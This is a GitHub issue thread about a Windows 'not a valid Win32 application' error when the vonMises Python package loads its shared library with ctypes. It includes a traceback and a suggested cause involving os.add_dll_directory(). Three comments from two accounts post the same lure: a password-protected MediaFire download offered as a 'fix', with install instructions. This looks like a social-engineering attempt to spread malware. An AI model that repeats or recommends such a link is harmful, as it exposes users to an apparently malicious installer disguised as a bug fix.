### ISSUE TITLE
OSError: [WinError 193] %1 is not a valid Win32 application

### ISSUE THREAD

**Issue by saudzahirr** [saudzahirr/vonMises#23]
**Description**:

When running `vonMises.exe -v`, the following traceback occurs:

```text
vonMises.exe -v
Traceback (most recent call last):
  File "<frozen runpy>", line 198, in _run_module_as_main
  File "<frozen runpy>", line 88, in _run_code
  File "C:\Miniconda\envs\vm\Scripts\vonMises.exe\__main__.py", line 4, in <module>
  File "C:\Miniconda\envs\vm\Lib\site-packages\vonmises\__main__.py", line 3, in <module>
    from vonmises import eigen, lib, utils, __version__
  File "C:\Miniconda\envs\vm\Lib\site-packages\vonmises\eigen.py", line 16, in <module>
    from vonmises.lib import vonmises_lib
  File "C:\Miniconda\envs\vm\Lib\site-packages\vonmises\lib.py", line 27, in <module>
    vonmises_lib = ctypes.CDLL(str(shared_file_path), winmode=0)
                   ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "C:\Miniconda\envs\vm\Lib\ctypes\__init__.py", line 376, in __init__
    self._handle = _dlopen(self._name, mode)
                   ^^^^^^^^^^^^^^^^^^^^^^^^^
OSError: [WinError 193] %1 is not a valid Win32 application
```

### Environment:
- OS: Windows
- Python version: [e.g. Python 3.12.5]
- Conda environment: `vm`
- `vonMises` version: [insert version]
- Additional information: [e.g. installed packages, architecture (32-bit vs. 64-bit), etc.]

### Solution:

This error is typically related to module loading or DLL dependencies. Starting from Python 3.8 and above, the `PATH` environment variable is no longer used for importing extension modules or loading DLLs. Instead, `os.add_dll_directory()` should be used to manage paths for DLL loading.

In some cases, explicitly adding a DLL directory may not be necessary because Python implicitly searches the directory of the loaded PYD/DLL. However, if the issue persists, try using `os.add_dll_directory()` to ensure the correct paths are being used for loading dependencies.

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by saudzahirr** [comment]
> **Description**:
> 
> When running `vonMises.exe -v`, the following traceback occurs:
> 
> ```
> vonMises.exe -v
> Traceback (most recent call last):
>   File "<frozen runpy>", line 198, in _run_module_as_main
>   File "<frozen runpy>", line 88, in _run_code
>   File "C:\Miniconda\envs\vm\Scripts\vonMises.exe\__main__.py", line 4, in <module>
>   File "C:\Miniconda\envs\vm\Lib\site-packages\vonmises\__main__.py", line 3, in <module>
>     from vonmises import eigen, lib, utils, __version__
>   File "C:\Miniconda\envs\vm\Lib\site-packages\vonmises\eigen.py", line 16, in <module>
>     from vonmises.lib import vonmises_lib
>   File "C:\Miniconda\envs\vm\Lib\site-packages\vonmises\lib.py", line 27, in <module>
>     vonmises_lib = ctypes.CDLL(str(shared_file_path), winmode=0)
>                    ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
>   File "C:\Miniconda\envs\vm\Lib\ctypes\__init__.py", line 376, in __init__
>     self._handle = _dlopen(self._name, mode)
>                    ^^^^^^^^^^^^^^^^^^^^^^^^^
> OSError: [WinError 193] %1 is not a valid Win32 application
> ```
> 
> ### Environment:
> * OS: Windows
> * Python version: [e.g. Python 3.12.5]
> * Conda environment: `vm`
> * `vonMises` version: [insert version]
> * Additional information: [e.g. installed packages, architecture (32-bit vs. 64-bit), etc.]
> 
> ### Solution:
> This error is typically related to module loading or DLL dependencies. Starting from Python 3.8 and above, the `PATH` environment variable is no longer used for importing extension modules or loading DLLs. Instead, `os.add_dll_directory()` should be used to manage paths for DLL loading.
> 
> In some cases, explicitly adding a DLL directory may not be necessary because Python implicitly searches the directory of the loaded PYD/DLL. However, if the issue persists, try using `os.add_dll_directory()` to ensure the correct paths are being used for loading dependencies.

https://bugs.python.org/issue44147
